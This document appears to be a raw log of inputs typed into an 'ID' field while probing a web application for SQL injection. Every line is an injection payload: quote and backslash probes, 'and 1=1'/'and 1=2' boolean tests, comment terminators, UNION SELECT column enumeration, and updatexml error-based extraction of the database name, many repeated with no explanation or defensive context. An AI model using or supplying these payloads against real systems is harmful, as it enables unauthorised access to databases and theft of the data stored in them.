ID:
ID:1
ID:1\
ID:1'
ID:1' || '
ID:1'  '
ID:1'  'a
ID:1'  || 'a
ID:1'  union select 1,2,3 || 'a
ID:-1'  union select 1,2,3 || 'a
ID:-1'  union select 1,2,3 -- 
ID:-1'  union select 1,2,3 'a
ID:1'
ID:1\
ID:1'  union select 1,2,3 || 'a
ID:1
ID:1'
ID:1 union select 1,2,3
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 #
ID:1' union select 1,2,3 #
ID:1' union select 1,2,3 #
ID:1' union select 1,2,3 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' and 1=1 #
ID:1' #
ID:1' #
ID:1' -- 
ID:1' and 1=2 -- 
ID:1' and 1=2 -- 
ID:1' and 1=2 -- 
ID:1' and 1=2 -- 
ID:1' and 1=1 -- 
ID:1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) -- 
ID:1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) -- 
ID:1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) -- 
ID:1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) -- 
ID:1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, concat(0x71, database(), 0x71), 1) -- 
ID:1' and updatexml(1, database(), 1) -- 
ID:1' and updatexml(1, database(), 1) -- 
ID:1' and updatexml(1, database(), 1) -- 
ID:1' and updatexml(1, database(), 1) -- 
ID:1' and updatexml(1, database(), 1) -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
